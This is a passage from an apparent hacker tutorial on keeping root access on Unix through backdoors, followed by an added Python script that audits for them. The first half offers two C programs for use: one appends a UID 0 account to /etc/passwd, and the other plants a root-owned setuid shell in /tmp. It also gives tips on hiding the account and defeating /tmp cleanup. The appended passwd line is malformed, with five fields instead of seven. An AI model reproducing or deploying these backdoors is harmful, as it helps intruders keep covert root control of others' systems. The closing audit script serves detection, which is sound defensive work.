The simplest method is to add an account with a UID of 0 to the passwd password file. But it is best not to do this, because as soon as the system administrator checks the password file, it will be discovered. The following is a C program that adds a UID 0 account to the /etc/passwd password file.
<++> Backdoor/backdoor1.c
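#include <stdio.h>

int main(void)
{
    FILE *fd;

    /* Append a UID 0 entry to the password file. */
    fd = fopen("/etc/passwd", "a+");
    if (fd == NULL)
        return 1;
    fprintf(fd, "hax0r:0:0:/root:/bin/sh\n");
    fclose(fd);
    return 0;
}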
<-->
A slightly more concealed method is to change the UID of an unused account buried in the password file to 0 and set its second field (the password field) to empty. (Note: If you are using a newer version of *nix, you may need to modify the /etc/shadow file.)
Place a suid shell in the /tmp directory. From then on, simply running this program gives you root privileges. This method is almost the most popular. However, many systems clear the /tmp directory every few hours or at every startup. Other systems do not allow suid programs in the /tmp directory. Of course, you can modify or remove these restrictions yourself (because you are already the root user, you have permission to modify the /var/spool/cron/crontabs/root and /etc/fstab files). The following is the C source program for placing the suid shell program in the /tmp directory.
<++> Backdoor/backdoor2.c
#include <stdlib.h>

int main(void)
{
    /* Copy the shell into /tmp, then make it root-owned and setuid. */
    system("cp /bin/sh /tmp/fid");
    system("chown root.root /tmp/fid");
    system("chmod 4755 /tmp/fid");
    return 0;
}
<-->
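From the administrator's side, both techniques above leave artifacts that a routine audit catches: an extra UID 0 or empty-password entry in the password file, and a setuid file under /tmp. The following audit script is an added example, not part of the original article; the function names and the sample passwd text are constructed for illustration.

```python
import os
import stat

def audit_passwd(text):
    """Return (line_no, account, reason) findings for passwd-format text."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        f = line.split(":")
        if len(f) != 7:
            findings.append((n, f[0], "malformed entry (expected 7 fields)"))
            continue
        name, pw, uid = f[0], f[1], f[2].strip()
        if uid.isdigit() and int(uid) == 0 and name != "root":
            findings.append((n, name, "UID 0 on a non-root account"))
        if pw == "":
            findings.append((n, name, "empty password field"))
    return findings

def is_setuid_file(mode):
    """True for a regular file whose mode has the setuid bit set."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID)

def find_setuid(directory):
    """Walk a directory and list (path, owner_uid) of setuid regular files."""
    hits = []
    for root, _dirs, files in os.walk(directory):
        for fn in files:
            path = os.path.join(root, fn)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # file vanished or is unreadable
            if is_setuid_file(st.st_mode):
                hits.append((path, st.st_uid))
    return hits

# Constructed sample, not taken from a real system.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
games::0:0:games:/usr/games:/bin/sh
hax0r:0:0:/root:/bin/sh
"""

if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD):
        print("passwd:", finding)
    for path, uid in find_setuid("/tmp"):
        print("setuid in /tmp:", path, "owner uid", uid)
```

On systems that use shadow passwords, the empty-password check also needs to be run against /etc/shadow, which the article notes is where the password field lives on newer versions.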